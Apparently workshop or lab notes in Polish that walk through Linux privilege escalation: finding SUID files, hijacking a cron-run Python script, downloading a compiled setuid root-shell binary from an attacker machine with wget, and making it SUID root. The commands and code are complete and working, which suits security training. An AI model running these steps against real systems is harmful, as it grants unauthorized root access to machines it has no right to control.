PASSUS SEC DAY === # 1. - Znalezienie pliku z ustawionym SUID: `find / -perm -u=s -type f 2>/dev/null` lub `find / -type f \( -perm 6755 -o -perm 777 -o -perm 6777 -o -perm 4777 \) 2>/dev/null` - Przejrzenie zawartości pliku ` cat /usr/lib/log/skrypt.py` - Przejrzenie zawartości pliku logów cron `tail /var/log/cron` :::info Zapisy w logu sugerują że skrypt ten jest wykonywany co 1 minutę ::: - Pobieramy plik który pozwoli nam uruchomić powłokę bash na prawach root :::warning Wcześniej należy go skompilować na Kalim ::: ```clike= int main(void) { setgid(0); setuid(0); system("/bin/bash"); } ``` Kompilacja ``` gcc -o rootbash rootbash.c ``` :::info Skrypt uruchomi /bin/bash z ustawionym setgid/setuid na wartość 0, aka root :) ::: - Na Kalim uruchamiamy szybko prosty serwer www `python -m SimpleHTTPServer` - Na hoście ofiary pobieramy plik do katalogu tmp `wget 172.16.20.96:8000/rootbash` - Zmiana skryptu w celu podwyższenia uprawnień ```python= #!/usr/bin/env python import os import sys try: os.system('chown root:root /tmp/rootbash; chmod 4755 /tmp/rootbash') except: sys.exit() ``` - Uruchamiamy plik `/tmp/rootbash` - Mamy roota :)